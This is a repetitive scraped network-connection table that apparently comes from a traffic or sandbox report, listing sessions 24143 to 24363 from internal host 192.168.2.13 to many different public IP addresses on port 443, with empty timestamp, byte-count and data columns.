                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24143192.168.2.133512683.135.12.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24144192.168.2.1345808122.150.42.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24145192.168.2.1339592106.72.220.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24146192.168.2.134055819.9.9.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24147192.168.2.134239264.76.47.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24148192.168.2.133311017.2.196.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24149192.168.2.135837268.83.68.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24150192.168.2.13600565.136.104.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24151192.168.2.133463050.200.120.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24152192.168.2.1338706115.121.157.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24153192.168.2.134556242.143.5.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24154192.168.2.134238669.150.61.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24155192.168.2.1357512102.28.123.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24156192.168.2.1343820149.30.223.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24157192.168.2.1338616118.22.94.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24158192.168.2.135886478.91.249.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24159192.168.2.133302697.192.139.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24160192.168.2.1352356211.27.203.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24161192.168.2.1347646213.10.203.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24162192.168.2.1344690186.43.82.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24163192.168.2.134570858.18.60.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24164192.168.2.1359528152.131.48.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24165192.168.2.1346276206.23.37.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24166192.168.2.1359178130.151.241.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24167192.168.2.13570024.11.122.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24168192.168.2.1348078103.114.199.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24169192.168.2.1360944202.32.183.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24170192.168.2.1340086152.226.88.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24171192.168.2.1357702105.134.17.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24172192.168.2.133520874.138.124.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24173192.168.2.1349658211.53.248.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24174192.168.2.133288840.129.246.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24175192.168.2.134948242.145.123.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24176192.168.2.135869817.151.55.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24177192.168.2.134926484.233.51.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24178192.168.2.1339532138.75.194.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24179192.168.2.133929050.238.227.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24180192.168.2.1354904120.188.209.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24181192.168.2.135571275.244.89.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24182192.168.2.1356076179.185.112.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24183192.168.2.1334974169.64.208.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24184192.168.2.13493668.34.115.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24185192.168.2.1356468156.83.221.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24186192.168.2.1359584179.225.14.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24187192.168.2.13553508.52.72.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24188192.168.2.135407653.76.190.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24189192.168.2.1338900102.108.152.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24190192.168.2.1355292209.19.118.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24191192.168.2.136087865.125.202.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24192192.168.2.135722441.164.226.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24193192.168.2.135969227.95.41.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24194192.168.2.134346232.105.86.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24195192.168.2.133579489.205.183.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24196192.168.2.134627654.2.153.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24197192.168.2.135435846.41.217.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24198192.168.2.1355642116.16.154.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24199192.168.2.133897689.230.161.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24200192.168.2.134503083.237.107.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24201192.168.2.1338164134.248.82.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24202192.168.2.133318092.107.183.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24203192.168.2.134467285.12.59.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24204192.168.2.133478087.232.251.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24205192.168.2.1339088192.29.145.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24206192.168.2.1336746176.50.245.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24207192.168.2.1343244138.90.109.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24208192.168.2.1333696128.34.218.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24209192.168.2.135900438.223.88.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24210192.168.2.1334134185.102.182.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24211192.168.2.133458439.224.237.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24212192.168.2.134266886.176.64.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24213192.168.2.1344794142.51.9.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24214192.168.2.135492250.178.4.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24215192.168.2.134047876.187.192.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24216192.168.2.1345242116.31.48.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24217192.168.2.1347182195.99.74.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24218192.168.2.1353396139.83.178.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24219192.168.2.1341134183.42.77.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24220192.168.2.135389859.119.239.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24221192.168.2.133408412.93.103.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24222192.168.2.1336746191.86.244.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24223192.168.2.1342942132.162.27.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24224192.168.2.1348286116.178.12.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24225192.168.2.1334356217.251.19.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24226192.168.2.1360484166.19.18.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24227192.168.2.135524439.132.110.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24228192.168.2.1344954133.212.80.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24229192.168.2.134837867.155.62.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24230192.168.2.1350014104.7.240.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24231192.168.2.135407217.135.73.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24232192.168.2.1340856174.162.96.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24233192.168.2.134105647.167.223.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24234192.168.2.1345560108.187.221.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24235192.168.2.1338976164.46.91.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24236192.168.2.135345291.97.50.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24237192.168.2.1356392116.116.74.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24238192.168.2.136080690.74.213.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24239192.168.2.1334410119.223.145.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24240192.168.2.1344126107.45.48.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24241192.168.2.1348246190.230.28.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24242192.168.2.1335830222.99.82.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24243192.168.2.1333176101.20.231.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24244192.168.2.1352524193.53.34.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24245192.168.2.1337196217.35.124.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24246192.168.2.1341592115.176.207.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24247192.168.2.1335274162.60.163.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24248192.168.2.1350100172.215.248.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24249192.168.2.135387248.4.202.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24250192.168.2.1351534101.71.62.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24251192.168.2.1354538106.64.82.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24252192.168.2.133664660.253.165.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24253192.168.2.1345098143.66.64.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24254192.168.2.134023090.84.134.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24255192.168.2.1348820145.230.111.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24256192.168.2.1351860220.190.193.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24257192.168.2.1360674134.104.173.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24258192.168.2.1353406114.235.74.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24259192.168.2.1360680119.98.65.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24260192.168.2.1337210114.22.198.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24261192.168.2.1347220179.255.2.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24262192.168.2.134554844.185.32.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24263192.168.2.1359210222.97.161.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24264192.168.2.136096260.70.88.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24265192.168.2.1335994140.150.252.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24266192.168.2.1353488171.173.168.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24267192.168.2.136073445.164.238.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24268192.168.2.1343122193.9.214.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24269192.168.2.1334742202.5.92.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24270192.168.2.1350002116.102.62.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24271192.168.2.1354072162.67.0.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24272192.168.2.134975054.254.6.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24273192.168.2.133480838.1.156.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24274192.168.2.1345534169.5.7.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24275192.168.2.1343104156.241.46.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24276192.168.2.1351614157.152.93.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24277192.168.2.133643682.153.179.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24278192.168.2.1340486125.104.203.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24279192.168.2.1343834209.167.159.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24280192.168.2.1343896169.62.233.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24281192.168.2.133842858.58.217.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24282192.168.2.1347436115.243.250.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24283192.168.2.134894835.1.81.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24284192.168.2.1341630184.189.217.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24285192.168.2.1351618191.55.125.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24286192.168.2.1355354203.195.61.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24287192.168.2.1340572135.193.175.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24288192.168.2.134890070.137.247.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24289192.168.2.1338122131.95.136.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24290192.168.2.1354484150.228.63.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24291192.168.2.1348312104.124.10.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24292192.168.2.1333090184.202.124.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24293192.168.2.135299224.152.144.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24294192.168.2.1336328196.79.211.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24295192.168.2.1343152144.142.14.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24296192.168.2.1359736116.46.231.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24297192.168.2.1339942172.200.96.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24298192.168.2.133951820.198.189.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24299192.168.2.135119440.0.243.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24300192.168.2.1360718173.68.148.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24301192.168.2.1357868173.122.131.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24302192.168.2.1352344161.235.113.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24303192.168.2.1350334194.167.207.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24304192.168.2.135196258.20.35.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24305192.168.2.1347662136.200.1.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24306192.168.2.1335482110.210.49.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24307192.168.2.1348516192.172.24.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24308192.168.2.1333672187.71.76.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24309192.168.2.135452075.84.68.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24310192.168.2.1359002203.166.199.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24311192.168.2.1354340180.156.147.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24312192.168.2.135329048.145.25.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24313192.168.2.1341954177.163.191.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24314192.168.2.134412031.11.110.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24315192.168.2.133494047.72.154.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24316192.168.2.134880235.90.177.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24317192.168.2.1348322206.7.36.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24318192.168.2.1335262101.94.226.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24319192.168.2.13394789.240.64.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24320192.168.2.1357302188.170.79.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24321192.168.2.13550541.194.47.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24322192.168.2.135021072.131.164.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24323192.168.2.1352890189.174.95.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24324192.168.2.134933478.136.234.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24325192.168.2.135406692.72.202.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24326192.168.2.1355878145.116.250.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24327192.168.2.1350760170.35.33.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24328192.168.2.1352188125.108.204.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24329192.168.2.1348634198.169.121.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24330192.168.2.1347616112.160.10.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24331192.168.2.1337568164.216.54.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24332192.168.2.1346912213.213.178.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24333192.168.2.135687212.144.189.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24334192.168.2.135405231.106.138.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24335192.168.2.135700034.217.24.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24336192.168.2.135161288.102.8.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24337192.168.2.135773414.63.150.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24338192.168.2.1334008162.169.137.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24339192.168.2.133754486.44.75.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24340192.168.2.13456521.164.97.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24341192.168.2.1335310210.95.202.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24342192.168.2.133954841.95.40.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24343192.168.2.135684879.14.33.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24344192.168.2.135341214.100.38.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24345192.168.2.1354568136.233.179.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24346192.168.2.1333370186.236.90.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24347192.168.2.1353386192.77.104.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24348192.168.2.13533028.113.74.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24349192.168.2.1340480206.206.99.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24350192.168.2.134672075.174.62.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24351192.168.2.134060625.16.52.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24352192.168.2.133488284.180.2.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24353192.168.2.1336778151.121.96.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24354192.168.2.1335944116.23.145.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24355192.168.2.136072283.180.99.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24356192.168.2.1343114210.206.43.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24357192.168.2.134524874.83.238.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24358192.168.2.134558670.169.212.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24359192.168.2.134711278.76.92.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24360192.168.2.1353496168.56.223.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24361192.168.2.135801420.101.93.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24362192.168.2.133405063.33.230.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24363192.168.2.1348120102.166.88.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
